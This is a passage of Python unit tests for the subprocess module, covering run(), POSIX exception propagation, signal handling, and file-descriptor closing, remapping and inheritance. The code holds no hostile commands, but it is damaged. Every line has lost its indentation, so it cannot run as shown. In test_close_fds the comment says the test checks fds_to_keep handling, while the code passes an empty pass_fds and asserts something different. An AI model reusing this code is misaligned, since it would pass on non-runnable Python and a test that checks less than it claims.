@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-specific for simplicity, just to get at least
# some coverage. It is not a platform-specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
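# subprocess.run() (added in Python 3.5) wraps Popen plus communicate() and
# returns a CompletedProcess whose args, returncode, stdout and stderr
# attributes are what the tests below inspect; check=True turns a non-zero
# exit status into CalledProcessError.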
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard-coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistant directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it, depending on the test execution environment;
# that still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
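# _TestExecuteChildPopen works because the kernel always hands out the lowest
# free descriptor: if _execute_child had double-closed one of the pipe fds now
# backing stdin/stdout/stderr, one of the /dev/zero opens above would be given
# that same number and assertNotIn would fire (the issue #16140 scenario).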
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
def test_args_string(self):
# args is a string
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!/bin/sh\n")
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
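    # _save_fds()/_restore_fds() dup() the standard descriptors out of the way
    # and later dup2() them back with their original inheritable flag, so the
    # tests below can freely close and remap fds 0-2.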
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
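    # For example, check_swap_fds(1, 2, 0) writes "STDIN" to fd 1, then asks
    # Popen to use fd 1 as stdin, fd 2 as stdout and fd 0 as stderr, forcing
    # the child setup code to rotate all three descriptors without clobbering
    # any of them.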
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
            # The pure Python implementation keeps the original message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=())
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & fds_to_keep & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
        # avoid messing with the larger unittest process's maximum
# number of file descriptors.
# This process launches:
        # +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
        # Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
